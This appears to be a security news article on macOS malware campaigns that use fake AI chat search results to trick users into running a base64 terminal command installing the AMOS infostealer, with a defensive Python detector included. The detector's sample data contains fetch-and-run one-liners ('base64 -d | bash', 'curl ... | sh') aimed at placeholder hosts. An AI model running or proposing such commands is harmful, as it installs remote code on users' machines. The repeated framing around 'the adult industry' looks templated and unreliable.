New macOS malware campaigns are leveraging AI-generated chat results to spread malicious software, including a variant of the Atomic macOS Stealer (AMOS) infostealer. The attacks exploit trust in AI-powered tools and services, using fake conversations to prompt users into running terminal commands that install the malware.
What Happened
Cybersecurity researchers have identified multiple campaigns spreading malicious software on macOS devices through fake AI chat results. In one instance, a Google search for "clear disk space on macOS" yielded an AI conversation result embedded directly in the search results; it offered clear step-by-step instructions and ended with a terminal command that installed Atomic macOS Stealer (AMOS), often referred to as the AMOS infostealer.
According to researchers, once the terminal command is executed, the infection chain starts immediately. The base64 string in the command decodes into a URL that hosts a malicious bash script. This script is designed to harvest credentials, escalate privileges, and establish persistence without triggering a visible security warning.
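The delivery step described above has a recognizable shape in command-line telemetry: a base64 blob decoded on the fly, or a curl/wget download, piped straight into a shell. The following detector is an added example written for this article, not code from the researchers or from any product; it runs over constructed sample command lines (the domains are reserved example names, not indicators from the campaign), flags the pipe-to-shell pattern, and decodes embedded base64 to surface the URL an analyst would want to triage or block.

```python
import base64
import re
from typing import Optional

# Constructed sample command lines, in the form a shell history or EDR
# process-creation feed would present them. "example.invalid" is a reserved
# placeholder domain, not an indicator from any real campaign.
_B64_URL = base64.b64encode(b"https://cdn.example.invalid/clean.sh").decode()
SAMPLE_COMMANDS = [
    "ls -la ~/Library/Caches",
    'echo "' + _B64_URL + '" | base64 -d | bash',
    "curl -fsSL https://get.example.invalid/install.sh | sh",
    "brew update && brew upgrade",
    'curl -fsSL "$(echo ' + _B64_URL + ' | base64 -d)" | bash',
]

# Stage 1 of the pattern: output of base64 -d/-D/--decode, curl or wget is
# piped into sh, bash or zsh. [^|]* keeps the match inside one pipeline segment,
# so a decode nested in $(...) is still caught once the decoded text hits the pipe.
PIPE_TO_SHELL = re.compile(
    r"(?:base64\s+(?:-d|-D|--decode)|\bcurl\b|\bwget\b)[^|]*\|\s*(?:/bin/)?(?:ba|z)?sh\b"
)
# A run of base64 alphabet long enough to be a payload rather than a flag or word.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_IN_TEXT = re.compile(r"https?://[^\s'\"<>]+")


def decode_b64_urls(command: str) -> list:
    """Decode every base64-looking token in the command; return URLs found inside."""
    urls = []
    for tok in B64_TOKEN.findall(command):
        try:
            plain = base64.b64decode(tok, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError: not really base64
            continue
        urls.extend(URL_IN_TEXT.findall(plain))
    return urls


def classify(command: str) -> Optional[dict]:
    """Return a finding when a command pipes decoded or downloaded content into a shell."""
    if not PIPE_TO_SHELL.search(command):
        return None
    # Plain URLs in the command plus any hidden behind base64.
    urls = URL_IN_TEXT.findall(command) + decode_b64_urls(command)
    return {"command": command, "technique": "pipe-to-shell", "urls": urls}


def scan(commands) -> list:
    """Run classify() over a feed of command lines and keep only the findings."""
    return [f for f in map(classify, commands) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMANDS):
        print(finding["technique"], finding["urls"], "<-", finding["command"])
```

Piping downloaded text into a shell is common in legitimate installers too, so this belongs in a triage queue rather than a hard block; the decoded URL is what lets an analyst separate a known vendor domain from an unfamiliar one.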
Background and Context
Abusing search results to deliver malware is not new. In 2023, researchers discovered a campaign using sponsored search results and SEO-poisoned links that pointed to fake macOS software hosted on GitHub. The attackers impersonated legitimate apps and walked users through terminal commands that installed the same AMOS infostealer.
Another campaign identified by Mosyle used a fake website posing as the Grok AI app, tricking users into downloading a malicious macOS installer named Grok.dmg. This malware, dubbed SimpleStealth, deployed a Monero cryptocurrency miner built to stay out of sight. Mining activity only began when the Mac had been idle for at least a minute and stopped as soon as the user returned.
Why It Matters to the Industry
The use of AI-generated chat results to spread malware poses significant challenges to cybersecurity professionals in the adult industry. The attacks exploit trust in AI-powered tools and services, making it difficult for users to distinguish between legitimate and malicious conversations. This could lead to a faster cycle of new macOS threats, even if many individual samples remain relatively simple.
The fact that these campaigns have gone undetected by major antivirus engines highlights the need for more sophisticated security measures. The use of AI assistance in malware development is also concerning, as it lowers the technical barrier for attackers and speeds up the development process.
What Comes Next
Cybersecurity professionals in the adult industry must be vigilant in monitoring for these types of attacks. Mosyle advises users to avoid downloading apps from third-party websites, particularly pages that mimic well-known services. Software should only be installed from the Mac App Store or directly from trusted developers using verified domains.
Key Facts
- The malware being spread is Atomic macOS Stealer (AMOS), often referred to as AMOS infostealer.
- Fake AI chat results are used to prompt users into running terminal commands that install the malware.
- The attacks exploit trust in AI-powered tools and services, making it difficult for users to distinguish between legitimate and malicious conversations.
- Multiple campaigns have been identified, including one using a fake website posing as the Grok AI app.
- The install command carries a base64 string that decodes to a URL hosting a malicious bash script.
Cybersecurity professionals in the adult industry must be aware of these types of attacks and take necessary precautions to protect their users. The use of AI-generated chat results to spread malware is a concerning trend that requires immediate attention.